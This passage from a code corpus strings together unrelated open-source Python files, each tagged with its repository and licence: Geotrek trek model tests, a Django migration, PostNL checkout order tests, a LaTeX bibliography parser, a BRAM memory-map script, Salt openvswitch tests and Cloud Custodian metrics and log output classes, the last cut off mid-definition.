p1 = PathFactory.create(geom=LineString((0, 0), (5, 5)))
trek = TrekFactory.create(paths=[p1])
self.assertEqual(trek.city_departure, '')
city1 = CityFactory.create(geom=MultiPolygon(Polygon(((-1, -1), (3, -1), (3, 3),
(-1, 3), (-1, -1)))))
city2 = CityFactory.create(geom=MultiPolygon(Polygon(((3, 3), (9, 3), (9, 9),
(3, 9), (3, 3)))))
self.assertEqual([city for city in trek.cities], [city1, city2])
self.assertEqual(trek.city_departure, str(city1))
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_city_departure_nds(self):
trek = TrekFactory.create(geom=LineString((0, 0), (5, 5)))
self.assertEqual(trek.city_departure, '')
city1 = CityFactory.create(geom=MultiPolygon(Polygon(((-1, -1), (3, -1), (3, 3),
(-1, 3), (-1, -1)))))
city2 = CityFactory.create(geom=MultiPolygon(Polygon(((3, 3), (9, 3), (9, 9),
(3, 9), (3, 3)))))
self.assertEqual([city for city in trek.cities], [city1, city2])
self.assertEqual(trek.city_departure, str(city1))
class TrekUpdateGeomTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.trek = TrekFactory.create(published=True, geom=LineString(((700000, 6600000), (700100, 6600100)), srid=2154))
def test_save_with_same_geom(self):
geom = LineString(((700000, 6600000), (700100, 6600100)), srid=2154)
self.trek.geom = geom
self.trek.save()
retrieve_trek = Trek.objects.get(pk=self.trek.pk)
self.assertTrue(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001))
def test_save_with_another_geom(self):
geom = LineString(((-7, -7), (5, -7), (5, 5), (-7, 5), (-7, -7)), srid=2154)
self.trek.geom = geom
self.trek.save()
retrieve_trek = Trek.objects.get(pk=self.trek.pk)
if settings.TREKKING_TOPOLOGY_ENABLED:
self.assertFalse(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001))
else:
self.assertTrue(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001))
def test_save_with_provided_one_field_exclusion(self):
self.trek.save(update_fields=['geom'])
self.assertTrue(self.trek.pk)
def test_save_with_multiple_fields_exclusion(self):
new_trek = TrekFactory.create()
new_trek.description_en = 'Description Test update'
new_trek.ambiance = 'Very special ambiance, for test purposes.'
new_trek.save(update_fields=['description_en'])
db_trek = Trek.objects.get(pk=new_trek.pk)
self.assertTrue(db_trek.pk)
self.assertEqual(db_trek.description_en, 'Description Test update')
self.assertNotEqual(db_trek.ambiance, 'Very special ambiance, for test purposes.')
new_trek.save(update_fields=['ambiance_en'])
db_trek = Trek.objects.get(pk=new_trek.pk)
self.assertEqual(db_trek.ambiance_en, 'Very special ambiance, for test purposes.')
class TrekItinerancyTest(TestCase):
def test_next_previous(self):
trekA = TrekFactory(name="A")
trekB = TrekFactory(name="B")
trekC = TrekFactory(name="C")
trekD = TrekFactory(name="D")
OrderedTrekChild(parent=trekC, child=trekA, order=42).save()
OrderedTrekChild(parent=trekC, child=trekB, order=15).save()
OrderedTrekChild(parent=trekD, child=trekA, order=1).save()
self.assertEqual(list(trekA.children_id), [])
self.assertEqual(list(trekB.children_id), [])
self.assertEqual(list(trekC.children_id), [trekB.id, trekA.id])
self.assertEqual(list(trekD.children_id), [trekA.id])
self.assertEqual(trekA.next_id, {trekC.id: None, trekD.id: None})
self.assertEqual(trekB.next_id, {trekC.id: trekA.id})
self.assertEqual(trekC.next_id, {})
self.assertEqual(trekD.next_id, {})
self.assertEqual(trekA.previous_id, {trekC.id: trekB.id, trekD.id: None})
self.assertEqual(trekB.previous_id, {trekC.id: None})
self.assertEqual(trekC.previous_id, {})
self.assertEqual(trekD.previous_id, {})
def test_delete_child(self):
trekA = TrekFactory(name="A")
trekB = TrekFactory(name="B")
trekC = TrekFactory(name="C")
OrderedTrekChild(parent=trekA, child=trekB, order=1).save()
OrderedTrekChild(parent=trekA, child=trekC, order=2).save()
self.assertTrue(OrderedTrekChild.objects.filter(child=trekB).exists())
self.assertQuerysetEqual(trekA.children, ['<Trek: B>', '<Trek: C>'])
self.assertQuerysetEqual(trekB.parents, ['<Trek: A>'])
self.assertQuerysetEqual(trekC.parents, ['<Trek: A>'])
self.assertEqual(list(trekA.children_id), [trekB.id, trekC.id])
self.assertEqual(trekB.parents_id, [trekA.id])
self.assertEqual(trekC.parents_id, [trekA.id])
trekB.delete()
self.assertEqual(trekC.previous_id_for(trekA), None)
self.assertEqual(trekC.next_id_for(trekA), None)
self.assertEqual(trekC.next_id, {trekA.id: None})
self.assertEqual(trekC.previous_id, {trekA.id: None})
self.assertFalse(OrderedTrekChild.objects.filter(child=trekB).exists())
self.assertQuerysetEqual(trekA.children, ['<Trek: C>'])
self.assertQuerysetEqual(trekC.parents, ['<Trek: A>'])
self.assertEqual(list(trekA.children_id), [trekC.id])
self.assertEqual(trekC.parents_id, [trekA.id])
def test_delete_parent(self):
trekA = TrekFactory(name="A")
trekB = TrekFactory(name="B")
trekC = TrekFactory(name="C")
OrderedTrekChild(parent=trekB, child=trekA, order=1).save()
OrderedTrekChild(parent=trekC, child=trekA, order=2).save()
self.assertTrue(OrderedTrekChild.objects.filter(parent=trekB).exists())
self.assertQuerysetEqual(trekA.parents, ['<Trek: B>', '<Trek: C>'], ordered=False)
self.assertQuerysetEqual(trekB.children, ['<Trek: A>'])
self.assertQuerysetEqual(trekC.children, ['<Trek: A>'])
self.assertEqual(trekA.parents_id, [trekB.id, trekC.id])
self.assertEqual(list(trekB.children_id), [trekA.id])
self.assertEqual(list(trekC.children_id), [trekA.id])
trekB.delete()
self.assertEqual(trekA.previous_id_for(trekC), None)
self.assertEqual(trekA.next_id_for(trekC), None)
self.assertEqual(trekA.next_id, {trekC.id: None})
self.assertEqual(trekA.previous_id, {trekC.id: None})
self.assertFalse(OrderedTrekChild.objects.filter(parent=trekB).exists())
self.assertQuerysetEqual(trekA.parents, ['<Trek: C>'])
self.assertQuerysetEqual(trekC.children, ['<Trek: A>'])
self.assertEqual(trekA.parents_id, [trekC.id])
self.assertEqual(list(trekC.children_id), [trekA.id])
class MapImageExtentTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.trek = TrekFactory.create(
points_reference=MultiPoint([Point(0, 0), Point(1, 1)], srid=settings.SRID),
parking_location=Point(0, 0, srid=settings.SRID),
)
POIFactory.create(paths=[(cls.trek.paths.first(), 0.25, 0.25)], published=True)
def test_get_map_image_extent(self):
lng_min, lat_min, lng_max, lat_max = self.trek.get_map_image_extent()
self.assertAlmostEqual(lng_min, -1.3630812101179004)
self.assertAlmostEqual(lat_min, -5.983856309208769)
self.assertAlmostEqual(lng_max, 3.001303976720215)
self.assertAlmostEqual(lat_max, 46.50090044234927)
class RatingScaleTest(TestCase):
def test_ratingscale_str(self):
scale = RatingScaleFactory.create(name='Bar', practice__name='Foo')
self.assertEqual(str(scale), 'Bar (Foo)')
class RatingTest(TestCase):
def test_rating_str(self):
scale = RatingFactory.create(name='Bar')
self.assertEqual(str(scale), 'RatingScale : Bar')
|
GeotrekCE/Geotrek-admin
|
geotrek/trekking/tests/test_models.py
|
Python
|
bsd-2-clause
| 21,282 | 0.001786 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-20 23:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('authentication', '0003_auto_20160620_2027'),
('feed', '0005_auto_20160620_1547'),
]
operations = [
migrations.AddField(
model_name='post',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='posts', to='authentication.Profile'),
preserve_default=False,
),
]
|
winstein27/social
|
social/feed/migrations/0006_post_author.py
|
Python
|
agpl-3.0
| 660 | 0.001515 |
import datetime
import decimal
from django.test import TestCase
from django.core.cache import cache
from httmock import HTTMock
from django_dynamic_fixture import G, N
from postnl_checkout.contrib.django_postnl_checkout.models import Order
from .base import PostNLTestMixin
class OrderTests(PostNLTestMixin, TestCase):
""" Tests for Order model. """
maxDiff = None
def setUp(self):
super(OrderTests, self).setUp()
self.order_datum = datetime.datetime(
year=2011, month=7, day=21,
hour=20, minute=11, second=0
)
self.verzend_datum = datetime.datetime(
year=2011, month=7, day=22,
hour=20, minute=11, second=0
)
def test_save(self):
""" Test saving an Order model. """
instance = N(Order)
instance.clean()
instance.save()
def test_prepare_order(self):
""" Test prepare_order class method. """
# Setup mock response
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('prepare_order_request.xml')
)
return self.read_file('prepare_order_response.xml')
kwargs = {
'AangebodenBetaalMethoden': {
'PrepareOrderBetaalMethode': {
'Code': 'IDEAL',
'Prijs': '5.00'
}
},
'AangebodenCommunicatieOpties': {
'PrepareOrderCommunicatieOptie': {
'Code': 'NEWS'
}
},
# FIXME: the following is not submitted by SUDS
# Most probably because it is not properly defined in the WSDL
# Contact PostNL about this.
# 'AangebodenOpties': {
# 'PrepareOrderOptie': {
# 'Code': 'WRAP',
# 'Prijs': '2.50'
# }
# },
# 'AfleverOpties': {
# 'AfleverOptie': {
# 'Code': 'PG',
# 'Kosten': '0.00',
# 'Toegestaan': True
# }
# },
'Consument': {
'ExtRef': 'test@e-id.nl'
},
'Contact': {
'Url': 'http://www.kadowereld.nl/url/contact'
},
'Order': {
'ExtRef': '1105_900',
'OrderDatum': self.order_datum,
'Subtotaal': '125.00',
'VerzendDatum': self.verzend_datum,
'VerzendKosten': '12.50'
},
'Retour': {
'BeschrijvingUrl': 'http://www.kadowereld.nl/url/beschrijving',
'PolicyUrl': 'http://www.kadowereld.nl/url/policy',
'RetourTermijn': 28,
'StartProcesUrl': 'http://www.kadowereld.nl/url/startproces'
},
'Service': {
'Url': 'http://www.kadowereld.nl/url/service'
}
}
# Execute API call
with HTTMock(response):
instance = Order.prepare_order(**kwargs)
# Assert model field values
self.assertTrue(instance.pk)
self.assertEquals(
instance.order_token, '0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
self.assertEquals(
instance.order_ext_ref, '1105_900'
)
self.assertEquals(
instance.order_date, self.order_datum
)
# Assert JSON values
self.assertEquals(instance.prepare_order_request, kwargs)
self.assertEquals(instance.prepare_order_response, {
'Checkout': {
'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c',
'Url': (
'http://tpppm-test.e-id.nl/Orders/OrderCheckout'
'?token=0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
},
'Webshop': {
'IntRef': 'a0713e4083a049a996c302f48bb3f535'
}
})
def test_read_order(self):
""" Test read_order method. """
# Setup mock response
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('read_order_request.xml')
)
return self.read_file('read_order_response.xml')
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
# Read order data
with HTTMock(response):
new_instance = instance.read_order()
response_data = new_instance.read_order_response
self.assertTrue(response_data)
self.assertEquals(response_data, {
'Voorkeuren': {
'Bezorging': {
'Tijdvak': {
'Start': u'10:30',
'Eind': u'08:30'
},
'Datum': datetime.datetime(2012, 4, 26, 0, 0)
}
},
'Consument': {
'GeboorteDatum': datetime.datetime(1977, 6, 15, 0, 0),
'ExtRef': u'jjansen',
'TelefoonNummer': u'06-12345678',
'Email': u'j.jansen@e-id.nl'
},
'Facturatie': {
'Adres': {
'Huisnummer': u'1',
'Initialen': u'J',
'Geslacht': u'Meneer',
'Deurcode': None,
'Gebruik': u'P',
'Gebouw': None,
'Verdieping': None,
'Achternaam': u'Jansen',
'Afdeling': None,
'Regio': None,
'Land': u'NL',
'Wijk': None,
'Postcode': u'4131LV',
'Straat': 'Lage Biezenweg',
'Bedrijf': None,
'Plaats': u'Vianen',
'Tussenvoegsel': None,
'Voornaam': u'Jan',
'HuisnummerExt': None
}
},
'Webshop': {
'IntRef': u'a0713e4083a049a996c302f48bb3f535'
},
'CommunicatieOpties': {
'ReadOrderResponseCommunicatieOptie': [
{
'Text': u'Do not deliver to neighbours',
'Code': u'REMARK'
}
]
},
'Bezorging': {
'ServicePunt': {
'Huisnummer': None,
'Initialen': None,
'Geslacht': None,
'Deurcode': None,
'Gebruik': None,
'Gebouw': None,
'Verdieping': None,
'Achternaam': None,
'Afdeling': None,
'Regio': None,
'Land': None,
'Wijk': None,
'Postcode': None,
'Straat': None,
'Bedrijf': None,
'Plaats': None,
'Tussenvoegsel': None,
'Voornaam': None,
'HuisnummerExt': None
},
'Geadresseerde': {
'Huisnummer': u'1',
'Initialen': u'J',
'Geslacht': u'Meneer',
'Deurcode': None,
'Gebruik': u'Z',
'Gebouw': None,
'Verdieping': None,
'Achternaam': u'Janssen',
'Afdeling': None,
'Regio': None,
'Land': u'NL',
'Wijk': None,
'Postcode': u'4131LV',
'Straat': u'Lage Biezenweg ',
'Bedrijf': u'E-ID',
'Plaats': u'Vianen',
'Tussenvoegsel': None,
'Voornaam': u'Jan',
'HuisnummerExt': None
}
},
'Opties': {
'ReadOrderResponseOpties': [
{
'Text': u'Congratulat ions with your new foobar!',
'Code': u'CARD',
'Prijs': decimal.Decimal('2.00')
}
]
},
'Order': {
'ExtRef': u'15200_001'
},
'BetaalMethode': {
'Optie': u'0021',
'Code': u'IDEAL',
'Prijs': decimal.Decimal('0.00')
}
})
def test_confirm_order(self):
""" Test confirm_order """
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('confirm_order_request.xml')
)
return self.read_file('confirm_order_response.xml')
kwargs = {
'Order': {
'PaymentTotal': decimal.Decimal('183.25')
}
}
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c',
order_ext_ref='1105_900'
)
# Execute API call
with HTTMock(response):
instance.confirm_order(**kwargs)
def test_update_order(self):
""" Test update_order """
def response_success(url, request):
self.assertXMLEqual(
request.body, self.read_file('update_order_request.xml')
)
return self.read_file('update_order_response_success.xml')
def response_fail(url, request):
self.assertXMLEqual(
request.body, self.read_file('update_order_request.xml')
)
return self.read_file('update_order_response_fail.xml')
kwargs = {
'Order': {
'ExtRef': 'FDK004',
'Zending': {
'UpdateOrderOrderZending': {
'Busstuk': {
'UpdateOrderOrderZendingBusstuk': {
'Verzonden': '23-08-2011 12:00:00'
}
},
'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df',
'Pakket': {
'UpdateOrderOrderZendingPakket': {
'Barcode': '3s123456789',
'Postcode': '4131LV'
}
}
}
}
}
}
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c',
order_ext_ref='1105_900'
)
# Make call fail
with HTTMock(response_fail):
self.assertRaises(
Exception, lambda: instance.update_order(**kwargs)
)
# Make call pass
with HTTMock(response_success):
response = instance.update_order(**kwargs)
self.assertTrue(response)
# Make sure the requested stuff is saved
self.assertEquals(
instance.update_order_request, {
'Checkout': {
'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c'
},
'Order': {
'ExtRef': 'FDK004',
'Zending': {
'UpdateOrderOrderZending': {
'Busstuk': {
'UpdateOrderOrderZendingBusstuk': {
'Verzonden': '23-08-2011 12:00:00'
}
},
'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df',
'Pakket': {
'UpdateOrderOrderZendingPakket': {
'Barcode': '3s123456789',
'Postcode': '4131LV'
}
}
}
}
}
}
)
def test_ping_status(self):
""" Test ping_status """
instance = G(Order)
self.response_called = 0
def ok_response(url, request):
# Assert
self.assertXMLEqual(
request.body,
self.read_file('ping_status_request.xml')
)
self.response_called += 1
return self.read_file('ping_status_response_ok.xml')
def nok_response(url, request):
return self.read_file('ping_status_response_nok.xml')
with HTTMock(ok_response):
self.assertEquals(instance.ping_status(), True)
self.assertEquals(self.response_called, 1)
# Repeated call should not cause the response to be called
with HTTMock(ok_response):
self.assertEquals(instance.ping_status(), True)
self.assertEquals(self.response_called, 1)
# Clear cache
cache.clear()
with HTTMock(nok_response):
self.assertEquals(instance.ping_status(), False)
|
dokterbob/python-postnl-checkout
|
tests/test_django.py
|
Python
|
agpl-3.0
| 13,320 | 0 |
# bibliography.py
r'''
Defines the BibItem() and Bibliography() classes (both sub-classed from Node)
The Bibliography() object is initialized directly from
a .bib file using the `bibtexparser` package.
We use registry.ClassFactory for unlisted fields
'''
import os
import logging
log = logging.getLogger(__name__)
import re, bibtexparser
from .registry import ClassFactory
from .command import Command
from .content import Text
class BibItem(Command):
def __init__(self, citation_key=None):
Command.__init__(self)
self.citation_key = citation_key
def __repr__(self):
if self.citation_key:
return '{}:{}({})'.format(self.genus, self.species, self.citation_key)
return '{}:{}()'.format(self.genus, self.species)
def harvard_dict(self):
'''
Create a dictionary of fields required for harvard-style citations.
Returns a dict of citation keys mapped onto bibliographic information in the correct format.
The main difficulty is with the 'author' key.
'''
bibtex_tags = ('title', 'author', 'year', 'publisher', 'isbn')
harv = dict()
surnames = list()
initials = list()
for child in self.children:
# deal with author field
if child.species == 'author':
# split on
# (1) authors: delimited by a comma (,) or an 'and', then
# (2) names: delimited by a point (.) or a space
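                # e.g. (illustrative): 'Jane Q. Public and John Doe'
                #   -> [['Jane', 'Q.', 'Public'], ['John', 'Doe']]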
author_str = child.content
author_list = [x.split(' ') for x in re.split(',|and', author_str)]
author_list = [[x.strip() for x in au if x] for au in author_list]
for author in author_list:
surnames.append(author[-1])
initials.append('.'.join([x[0] for x in author[:-1]]) + '.')
names = ['%s, %s' % name for name in zip(surnames, initials)]
                if len(names) == 1:
                    harv['author'] = names[0]
                else:
                    harv['author'] = ' and '.join([', '.join(names[:-1]), names[-1]])
# copy bibtex (tag, content) pairs for tags in bibtex_fields
else:
if child.species in bibtex_tags:
harv[child.species] = child.content
# set citation text e.g. (Evans 2012)
if len(surnames) == 1:
harv['citation'] = '(%s, %s)' % (surnames[0], harv['year'])
elif len(surnames) == 2:
harv['citation'] = '(%s & %s, %s)' % (surnames[0], surnames[1], harv['year'])
        elif len(surnames) >= 3:
harv['citation'] = '(%s et al. %s)' % (surnames[0], harv['year'])
return harv
def harvard(self):
''' print harvard-style item (should be done in a template!) '''
title = ''
author = ''
year = ''
publisher = ''
for child in self.children:
if child.species == 'title':
title = child.content
elif child.species == 'author':
author_str = child.content
auth_list = [x.split('.') for x in re.split(',|and', author_str)]
auth_list = [[x.strip() for x in au] for au in auth_list]
auth_parts = []
for auth in auth_list:
name = auth[-1] + ' ' + '.'.join([x[0] for x in auth[:-1]]) + '.'
auth_parts.append(name)
                if len(auth_parts) == 1:
                    author = auth_parts[0]
                else:
                    author = ' and '.join([', '.join(auth_parts[:-1]), auth_parts[-1]])
elif child.species == 'year':
year = child.content
elif child.species == 'publisher':
publisher = child.content
else:
pass
return '%s (%s) %s. %s.' % (author, year, title, publisher)
class Bibliography(Command):
r'''
    Bibliography is a block command whose `children` is a list of BibItem objects.
    This is an example of a Command which logically encloses what follows.
The data is read from a .bib file then parsed into a dictionary by the
`bibtexparser` package.
At the moment it can only pull contents from a single bib file whereas
the command allows for \bibliography{refs1.bib, refs2.bib} etc.
'''
def __init__(self, bibtex_filename=None, LATEX_ROOT=None):
Command.__init__(self)
self.filename = bibtex_filename
if bibtex_filename:
if LATEX_ROOT:
bibtex_filename = os.path.join(LATEX_ROOT, bibtex_filename)
self.read_bibtex_file(bibtex_filename)
def read_bibtex_file(self, bibtex_filename):
if not bibtex_filename[-4:] == '.bib':
bibtex_filename = bibtex_filename + '.bib'
try:
with open(bibtex_filename) as bibtex_file:
chars = bibtex_file.read()
except FileNotFoundError as e:
raise Exception('Bibtex file \'{}\' not found'.format(e.filename))
# call bibtexparser
bibtex_db = bibtexparser.loads(chars)
for entry in bibtex_db.entries:
bibitem = BibItem()
for key, val in entry.items():
if key == 'ID':
bibitem.citation_key = val
else:
node = ClassFactory(str(key), [], BaseClass=Text)()
node.content = val
bibitem.append_child(node)
self.append_child(bibitem)
def chars(self):
'''
The raw format is the original command "\bibliography{refs.bib}"
We are not testing bibtexparser!
'''
return r'\bibliography{{{}}}{}'.format(self.filename, self.post_space)
def add_item(self, bibitem):
        if not isinstance(bibitem, BibItem):
            raise TypeError('Bibliography objects can only contain BibItem objects')
self.children.append(bibitem)
def harvard(self):
''' string harvard entries together '''
return '\n'.join([x.harvard() for x in self.children])
def test_bibtex():
bibtex_filename = './test_docs/test_article/references.bib'
bib = Bibliography(bibtex_filename)
print(bib.pretty_print())
print(bib.harvard())
print(bib.chars())
if __name__ == '__main__':
test_bibtex()
|
dimbyd/latextree
|
latextree/parser/bibliography.py
|
Python
|
mit
| 6,260 | 0.005591 |
import yaml
header="""
<?xml version="1.0" encoding="UTF-8"?>
<MemInfo Version="1" Minor="0">
<Processor Endianness="Little" InstPath="design/cortex">
<AddressSpace
Name="design_1_i_microblaze_0.design_1_i_microblaze_0_local_memory_dlmb_bram_if_cntlr" Begin="0" End="8191">
<BusBlock>
"""
footer="""
</BusBlock>
</AddressSpace>
</Processor>
<Config>
<Option Name="Part" Val="xc7a35tcsg324-1"/>
</Config>
</MemInfo>
"""
bitlane="""
<BitLane MemType="{type}" Placement="{placement}">
<DataWidth MSB="{msb}" LSB="{lsb}"/>
<AddressRange Begin="0" End="{end_address}"/>
<Parity ON="false" NumBits="0"/>
</BitLane>
"""
remap = [3,2,1,0,7,6,5,4,11,10,9,8,15,14,13,12]
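# remap reorders the 16 BRAM entries in groups of four (3,2,1,0 | 7,6,5,4 | ...)
# so the bit lanes are emitted in the byte order the MMI expects (assumed from
# the pattern; adjust if your bram.yaml ordering differs)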
bram = open("bram.yaml", "r")
doc = yaml.safe_load(bram)
bit_pos = 0
bit_width = 2
output = header
# for bram in doc['bram']:
for i in range(len(doc['bram'])):
bram = doc['bram'][remap[i]]
data = dict()
# print bram
data['lsb'] = bit_pos
data['msb'] = bit_pos + bit_width - 1
data['end_address'] = 16383
data['type'] = 'RAMB36E1'
data['placement'] = bram['SITE'].split('_')[1] # remove RAMB36_ in front of the position string
bit_pos += bit_width
output += bitlane.format(**data)
output += footer
print output
|
rbarzic/arty-cm0-designstart
|
synt/yaml2mmi.py
|
Python
|
gpl-2.0
| 1,294 | 0.017002 |
import pytest
import salt.states.openvswitch_port as openvswitch_port
from tests.support.mock import MagicMock, patch
@pytest.fixture
def configure_loader_modules():
return {openvswitch_port: {"__opts__": {"test": False}}}
def test_present():
"""
Test to verify that the named port exists on bridge, eventually creates it.
"""
name = "salt"
bridge = "br-salt"
ret = {"name": name, "result": None, "comment": "", "changes": {}}
mock = MagicMock(return_value=True)
mock_l = MagicMock(return_value=["salt"])
mock_n = MagicMock(return_value=[])
with patch.dict(
openvswitch_port.__salt__,
{
"openvswitch.bridge_exists": mock,
"openvswitch.interface_get_type": MagicMock(return_value='""'),
"openvswitch.port_list": mock_l,
},
):
comt = "Port salt already exists."
ret.update({"comment": comt, "result": True})
assert openvswitch_port.present(name, bridge) == ret
with patch.dict(
openvswitch_port.__salt__,
{
"openvswitch.bridge_exists": mock,
"openvswitch.interface_get_type": MagicMock(return_value='""'),
"openvswitch.port_list": mock_n,
"openvswitch.port_add": mock,
},
):
comt = "Port salt created on bridge br-salt."
ret.update(
{
"comment": comt,
"result": True,
"changes": {
"salt": {
"new": "Created port salt on bridge br-salt.",
"old": "No port named salt present.",
},
},
}
)
assert openvswitch_port.present(name, bridge) == ret
with patch.dict(
openvswitch_port.__salt__,
{
"openvswitch.bridge_exists": mock,
"openvswitch.port_list": mock_n,
"openvswitch.port_add": mock,
"openvswitch.interface_get_options": mock_n,
"openvswitch.interface_get_type": MagicMock(return_value=""),
"openvswitch.port_create_gre": mock,
"dig.check_ip": mock,
},
):
comt = "Port salt created on bridge br-salt."
ret.update(
{
"result": True,
"comment": (
"Created GRE tunnel interface salt with remote ip 10.0.0.1 and key"
" 1 on bridge br-salt."
),
"changes": {
"salt": {
"new": (
"Created GRE tunnel interface salt with remote ip 10.0.0.1"
" and key 1 on bridge br-salt."
),
"old": (
"No GRE tunnel interface salt with remote ip 10.0.0.1 and"
" key 1 on bridge br-salt present."
),
},
},
}
)
assert (
openvswitch_port.present(
name, bridge, tunnel_type="gre", id=1, remote="10.0.0.1"
)
== ret
)
|
saltstack/salt
|
tests/pytests/unit/states/test_openvswitch_port.py
|
Python
|
apache-2.0
| 3,213 | 0.000934 |
# Handy for debugging setup.py
"""Utilities creating reusable, DRY, setup.py installation scripts
Typical usage in setup.py:
>>> global_env, local_env = {}, {}
>>> execfile(join('pug', 'setup_util.py'), global_env, local_env)
>>> get_variable = local_env['get_variable']
"""
import os
def setup(*args, **kwargs):
print('setup() args = {0}'.format(args))
print('setup() kwargs = {0}'.format(kwargs))
def get_variable(relpath, keyword='__version__'):
"""Read __version__ or other properties from a python file without importing it
    from gist.github.com/technonik/406623 but with an added keyword kwarg """
for line in open(os.path.join(os.path.dirname(__file__), relpath), encoding='cp437'):
if keyword in line:
if '"' in line:
return line.split('"')[1]
elif "'" in line:
return line.split("'")[1]
|
hobson/pug
|
pug/setup_util.py
|
Python
|
mit
| 915 | 0.006557 |
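A self-contained sketch of how get_variable() above is meant to be used; the scanning logic is copied from the function, minus the __file__-relative lookup, and the temporary package file stands in for a real module.

import os
import tempfile

def get_variable(path, keyword='__version__'):
    # Same line-scanning idea as above: return the first quoted value
    # on a line containing the keyword.
    for line in open(path):
        if keyword in line:
            if '"' in line:
                return line.split('"')[1]
            elif "'" in line:
                return line.split("'")[1]

pkg = os.path.join(tempfile.mkdtemp(), '__init__.py')
with open(pkg, 'w') as f:
    f.write('__version__ = "1.2.3"\n')
print(get_variable(pkg))  # -> 1.2.3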
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Outputs metrics, logs, structured records across
a variety of sources.
See docs/usage/outputs.rst
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
import gzip
import logging
import shutil
import tempfile
import os
from c7n.registry import PluginRegistry
from c7n.log import CloudWatchLogHandler
from c7n.utils import chunks, local_session, parse_s3, get_retry
DEFAULT_NAMESPACE = "CloudMaid"
log = logging.getLogger('custodian.output')
metrics_outputs = PluginRegistry('c7n.blob-outputs')
blob_outputs = PluginRegistry('c7n.blob-outputs')
@metrics_outputs.register('aws')
class MetricsOutput(object):
"""Send metrics data to cloudwatch
"""
permissions = ("cloudWatch:PutMetricData",)
retry = staticmethod(get_retry(('Throttling',)))
BUFFER_SIZE = 20
@staticmethod
def select(metrics_selector):
if not metrics_selector:
return NullMetricsOutput
# Compatibility for boolean configuration
if isinstance(metrics_selector, bool):
metrics_selector = 'aws'
for k in metrics_outputs.keys():
if k.startswith(metrics_selector):
return metrics_outputs[k]
raise ValueError("invalid metrics option %r" % metrics_selector)
def __init__(self, ctx, namespace=DEFAULT_NAMESPACE):
self.ctx = ctx
self.namespace = namespace
self.buf = []
def get_timestamp(self):
"""
Now, if C7N_METRICS_TZ is set to TRUE, UTC timestamp will be used.
For backwards compatibility, if it is not set, UTC will be the default.
To disable this and use the system's time zone, C7N_METRICS_TZ shoule be set to FALSE.
"""
if os.getenv("C7N_METRICS_TZ", 'TRUE').upper() in ('TRUE', ''):
return datetime.datetime.utcnow()
else:
return datetime.datetime.now()
def flush(self):
if self.buf:
self._put_metrics(self.namespace, self.buf)
self.buf = []
def put_metric(self, key, value, unit, buffer=True, **dimensions):
point = self._format_metric(key, value, unit, dimensions)
self.buf.append(point)
        if buffer:
            # CloudWatch accepts at most BUFFER_SIZE (20) datapoints per request
            if len(self.buf) >= self.BUFFER_SIZE:
self.flush()
else:
self.flush()
def _format_metric(self, key, value, unit, dimensions):
d = {
"MetricName": key,
"Timestamp": self.get_timestamp(),
"Value": value,
"Unit": unit}
d["Dimensions"] = [
{"Name": "Policy", "Value": self.ctx.policy.name},
{"Name": "ResType", "Value": self.ctx.policy.resource_type}]
for k, v in dimensions.items():
d['Dimensions'].append({"Name": k, "Value": v})
return d
    def _put_metrics(self, ns, metrics):
        watch = local_session(self.ctx.session_factory).client('cloudwatch')
        # Send each chunk (not the whole list) and don't bail out after the
        # first batch; the original returned inside the loop.
        for metric_values in chunks(metrics, self.BUFFER_SIZE):
            self.retry(
                watch.put_metric_data, Namespace=ns, MetricData=metric_values)
class NullMetricsOutput(MetricsOutput):
permissions = ()
def __init__(self, ctx, namespace=DEFAULT_NAMESPACE):
super(NullMetricsOutput, self).__init__(ctx, namespace)
self.data = []
def _put_metrics(self, ns, metrics):
self.data.append({'Namespace': ns, 'MetricData': metrics})
for m in metrics:
if m['MetricName'] not in ('ActionTime', 'ResourceTime'):
log.debug(self.format_metric(m))
def format_metric(self, m):
label = "metric:%s %s:%s" % (m['MetricName'], m['Unit'], m['Value'])
for d in m['Dimensions']:
label += " %s:%s" % (d['Name'].lower(), d['Value'].lower())
return label
class LogOutput(object):
log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
def __init__(self, ctx):
self.ctx = ctx
def get_handler(self):
raise NotImplementedError()
def __enter__(self):
log.debug("Storing output with %s" % repr(self))
self.join_log()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None):
self.leave_log()
if exc_type is not None:
log.exception("Error while executing policy")
def join_log(self):
self.handler = self.get_handler()
self.handler.setLevel(logging.DEBUG)
self.handler.setFormatter(logging.Formatter(self.log_format))
mlog = logging.getLogger('custodian')
mlog.addHandler(self.handler)
def leave_log(self):
mlog = logging.getLogger('custodian')
mlog.removeHandler(self.handler)
self.handler.flush()
self.handler.close()
class CloudWatchLogOutput(LogOutput):
log_format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s'
def get_handler(self):
return CloudWatchLogHandler(
